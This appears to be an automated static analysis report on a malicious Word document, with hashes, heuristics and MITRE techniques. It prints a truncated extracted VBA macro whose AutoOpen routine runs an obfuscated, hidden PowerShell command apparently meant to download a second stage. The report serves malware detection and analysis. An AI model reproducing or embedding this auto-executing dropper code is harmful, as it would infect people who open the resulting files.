Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1fc5e29f2cbbe3f0…

MALICIOUS

Office (OLE)

Size: 113.8 KB
Created: 2018-05-25 05:28:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: c8c7ea0cce66bbebf0753e5d9cdb7122
SHA-1: 699f89be3d7fd540584a6b252132ce0dd16d116d
SHA-256: 1fc5e29f2cbbe3f07bc9abff8b4e9e6ccf957775f8a18bad3b481eb965e7e198
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine, a common technique for executing malicious code as soon as the document is opened. The macro calls the Shell() function to run a PowerShell command; the command is obfuscated but appears to be designed to download and execute a second-stage payload. Together, the Autoopen entry point and the Shell() call strongly indicate malicious intent.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18492 bytes
SHA-256: c96b575f11413239500c1763306c19ffdad8ab6ab3f8da4c58474540dbdb5f07

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "DCjhlAPIj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UupQYu()
On Error Resume Next
UCKfw = wiKfo - Cos(CAhtPS) * 1 - Chr(34255) / 87496 - ChrB(wUvLEW)
AFUoRz = 71210
KIkwrb = OXVvlj - Cos(XIWci) * 1 - Chr(41754) / 64749 - ChrB(UuwFi)
LAhDP = 10698
UupQYu = wfBqnJuLK + mRQrQsArJ + RbzjifPS + PAvzAWKntG + SpCiotwiji + wGpwvTIVKj + CFuhWRkfMz + vAdwuRMrm + NssChwwq + ITWRzj + zzoZom + oowQlNEn
GhVCDG = YpJlL - Cos(hLSpQP) * 1 - Chr(89158) / 92415 - ChrB(qzmzmD)
nrVaj = 31570
End Function
Sub Autoopen()
On Error Resume Next
AafObq = kNtuXA - Cos(snALnS) * 1 - Chr(83352) / 45484 - ChrB(GUCAB)
PkDRk = 34079
tIcKFiuKC (UupQYu)
lASFJ = jsDPC - Cos(vEVPtz) * 1 - Chr(68625) / 56397 - ChrB(YuZpc)
wJqGQ = 30107
End Sub
Function tIcKFiuKC(cDmathn)
On Error Resume Next
BzshIl = XDEAKG - Cos(uUKTA) * 1 - Chr(77682) / 9633 - ChrB(FtQhm)
iMJlaS = 5449
WLozp = UpYfVG - Cos(ojmQb) * 1 - Chr(46175) / 79128 - ChrB(zRbzCo)
vOjnKY = 95584
WhcWnZMKTk = Shell(krQtBTGaDq + Chr(vbKeyP) + BQXvhfbH + cDmathn, vbHide)
iCwRrQ = kLfht - Cos(WVzuNb) * 1 - Chr(45179) / 88282 - ChrB(wmwdt)
vhwfr = 63916
End Function


Attribute VB_Name = "OcGzdfjP"
Function wfBqnJuLK()
On Error Resume Next
JzKbc = vlFZLL - Cos(llMlo) * 1 - Chr(72691) / 60385 - ChrB(kivbnH)
aIQfB = 45824
mLjQGvQ = "owersHeLL -Wi" + "nDowsTyle hid" + "den -e KAA" + "oACIAewA1AH0Aew" + "AxADUANgB9AH" + "sAMQAwADQAfQB7A"
zrkrM = ImMqT - Cos(wXwLB) * 1 - Chr(32140) / 76539 - ChrB(YPOAp)
WLwJfJ = 78822
JIaYSZrMp = "DYAMgB9AHsA" + "NQA2AH0AewAzAD" + "kAfQB7" + "ADcAMQB9" + "AHsANwA" + "wAH0A" + "ewAwAH0AewAxADM"
oUAzZ = hwVFI - Cos(LBbzO) * 1 - Chr(28523) / 27267 - ChrB(BhdkCh)
wqDLJi = 70847
voYfF = "ANwB9AHsA" + "NAA0AH0AewA4ADQ" + "AfQB7ADgA" + "NQB9AHsA" + "NgB9AHsAMQAx" + "ADMAfQB7ADE" + "AMAAxAH0" + "AewA0ADYAfQB7A"
dLErSq = tJrZTV - Cos(zuQvpK) * 1 - Chr(12764) / 83865 - ChrB(usikH)
uwhaS = 95992
fRQWT = "DcAfQB7ADM" + "AfQB7ADEAN" + "QA1AH0Ae" + "wAyADYAfQ"
KXwIbo = sdNRM - Cos(IuNtac) * 1 - Chr(73316) / 91232 - ChrB(zjGSb)
tstDm = 25385
NHZFfwsi = "B7ADUAM" + "QB9AH" + "sAMQA1ADQAfQB7" + "ADMAMAB9"
tzjjSX = RiRYQ - Cos(zlnzp) * 1 - Chr(22683) / 81989 - ChrB(YMCIN)
zlTNa = 57645
lTZiaDlQ = "AHsAOAA4AH0Aew" + "A3ADgA" + "fQB7AD" + "EAMAA3AH0Ae" + "wA5ADAAfQB7"
BOMqK = YsURi - Cos(QPIEt) * 1 - Chr(26292) / 50590 - ChrB(jUmia)
TXjKE = 95742
pJOPDrrD = "ADkANwB9AHsAM" + "QAwADMAfQB7" + "ADEAM" + "wA5AH0" + "AewAyADIAfQB" + "7ADgA" + "MAB9AHsAMQAyADQ" + "AfQB7ADEAMgA5A" + "H0AewAx"
lwWbJf = SHDvUG - Cos(orjZzA) * 1 - Chr(14255) / 77944 - ChrB(biQEuA)
JNkPi = 33139
UziJLUwvpS = "ADAAMAB9AH" + "sANAAyAH0AewAz" + "ADMAfQB7A" + "DMANAB9AHsAOA"
ckhcEb = rJUJi - Cos(zlEzfz) * 1 - Chr(35184) / 90088 - ChrB(tbCRvu)
jqRXGE = 79350
hGmqTios = "AxAH0AewA" + "1ADAAfQB7ADEA" + "MQA4AH0AewA5A" + "DEAfQB7ADEANAA5" + "AH0AewA" + "4ADYAfQB7"
wfBqnJuLK = mLjQGvQ + JIaYSZrMp + voYfF + fRQWT + NHZFfwsi + lTZiaDlQ + pJOPDrrD + UziJLUwvpS + hGmqTios
End Function
Function mRQrQsArJ()
On Error Resume Next
XDMOk = vvQUN - Cos(Imkhw) * 1 - Chr(81766) / 69691 - ChrB(GamjXI)
drHZv = 91960
ZwQrQRwCIUd = "ADEAN" + "AA4AH0A" + "ewAxADQ" + "ANgB9AH" + "sAMQA2A"
abkDKT = fmwiVZ - Cos(GjYPTz) * 1 - Chr(21629) / 94103 - ChrB(jrcwS)
IvScW = 23436
FAjXZvqNQtU = "H0AewAyAH0A" + "ewAxADAAN" + "QB9AHsANgA2AH0" + "AewAxADQAMwB" + "9AHsAMQA0A" + "DQAfQB7A" + "DEAMAAy" + "AH0Aew" + "AxADkAfQB7"
zvjQu = nqzBjc - Cos(IiKbw) * 1 - Chr(52005) / 56832 - ChrB(DLiUf)
dBQsDl = 95141
wIpSfijpZcR = "ADkAfQB7A" + "DUANwB9AHsAM" + "QAxADcAf" + "QB7ADEANA"
cjDDjJ = ipsWu - Cos(Zkqivi) * 1 - Chr(94226) / 86749 - ChrB(wvPzKo)
JfrZVG = 51693
dzmFivuq = "A3AH0Ae" + "wAxADUAMAB9AHsA" + "NAAxAH0AewA" + "xADUAMQB9" + "AHsAN" + "AA3AH0A" + "ewAxA"
urUlV = pwkjD - Cos(ZOHCA) * 1 - Chr(87517) / 86652 - ChrB(HokwlB)
NiUaTJ = 36052
BIMfXXMLBE = "DIAM
... (truncated)